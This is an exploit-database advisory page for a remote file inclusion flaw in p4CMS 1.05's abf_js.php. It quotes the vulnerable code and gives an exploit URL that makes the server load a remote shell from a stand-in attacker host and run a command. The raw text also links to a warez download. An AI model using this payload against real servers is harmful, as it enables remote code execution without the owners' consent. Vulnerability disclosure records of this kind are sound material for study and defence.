header-logo
Suggest Exploit
vendor:
p4CMS
by:
SHiKaA
N/A
CVSS
N/A
Remote File Inclusion
98
CWE
Product Name: p4CMS
Affected Version From: 1.05
Affected Version To: 1.05
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

p4CMS <= v1.05 (abs_pfad) Remote File Inclusion Exploit

p4CMS version 1.05 is vulnerable to a remote file inclusion vulnerability due to a lack of proper sanitization of user-supplied input in the 'abs_pfad' parameter of the 'abf_js.php' script. An attacker can exploit this vulnerability by sending a malicious URL in the 'abs_pfad' parameter, which will be executed on the vulnerable server.

Mitigation:

Input validation should be used to prevent malicious input from being passed to the application. Additionally, the application should be configured to use a secure configuration.
Source

Exploit-DB raw data:

#==============================================================================================
#p4CMS <= v1.05 (abs_pfad) Remote File Inclusion Exploit
#===============================================================================================
#                                                                      
#Critical Level : Dangerous                                            
#                                                                      
#Venedor site : http://warez.gtasoft.ru/skripts/p4CMS.v1.05.Nullified-WTN.rar      
#                                                                      
#Version : v1.05                                            
#
#================================================================================================
#Bug in : abf_js.php
#
#Vlu Code :
#--------------------------------
#
#                    @require_once($abs_pfad."include/config.inc.php");
#                    @require_once($abs_pfad."include/mysql-class.inc.php");
#                    @require_once($abs_pfad."include/functions.inc.php");
#
#================================================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[Script Path]/abf_js.php?abs_pfad=http://SHELLURL.COM?&cmd=id
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Conatact : SHiKaA-[at]hotmail.com
#
#GreetZ : CCtream - Cyper-worrier team
# Special Thx To : Str0ke & simoo
==================================================================================================

# milw0rm.com [2006-09-12]